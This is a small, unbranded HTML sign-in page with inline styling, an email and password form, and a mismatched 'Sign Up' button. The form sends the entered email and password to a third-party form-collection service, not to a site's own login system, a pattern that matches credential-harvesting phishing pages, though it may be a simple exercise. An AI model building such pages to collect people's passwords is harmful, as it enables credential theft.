<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign In</title>

    <style>
        body {
            background-color: #f5f5f5;
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
            margin: 0;
            font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif;
        }
        
        .container {
            background-color: rgba(197, 197, 197, 0.2);
            padding: 2rem;
            border-radius: 2rem;
            text-align: center;
            width: 100%;
            max-width: 500px;
        }
        
        h2 {
            margin-bottom: 1rem;
            font-weight: bold;
            color: black;
        }
        
        input[type="email"],
        input[type="password"],
        button {
            width: 70.5%;
            padding: 0.5rem 0.7rem;
            border-radius: 0.6rem;
            margin-bottom: 1rem;
            box-sizing: border-box;
            color: black;
        }
        
        input[type="email"]:focus,
        input[type="password"]:focus {
            box-shadow: 0 0 0 0.2rem rgba(34, 78, 210, 0.25);
        }
        
        button {
            background: #0d6efd;
            color: #fff;
            border: none;
            cursor: pointer;
            border-radius: 2rem;
            width: 70.5%;
        }
        
        button:hover {
            background: #0a58ca;
        }
        
        .checkbox-container {
            display: flex;
            align-items: center;
            justify-content: center;
            margin-bottom: 1rem;
        }
        
        .checkbox-container input {
            margin-right: 0.5rem;
        }
    </style>
</head>

<body>
    <div class="container">
        <h2>Please Sign In</h2>
        <form action="https://formspree.io/f/mybnlqn" method="POST">
            <input type="email" name="email" placeholder="Email" required autofocus>
            <input type="password" name="password" placeholder="Password" required>
            <div class="checkbox-container">
                <input type="checkbox" id="rememberMe" name="remember">
                <label for="rememberMe">Remember Me</label>
            </div>
            <div class="d-grid gap-2 col-6 mx-auto">
                <button class="btn btn-primary" type="button">Sign Up</button>

            </div>

        </form>
        <footer>Copyright © 2020</footer>
    </div>
</body>

</html>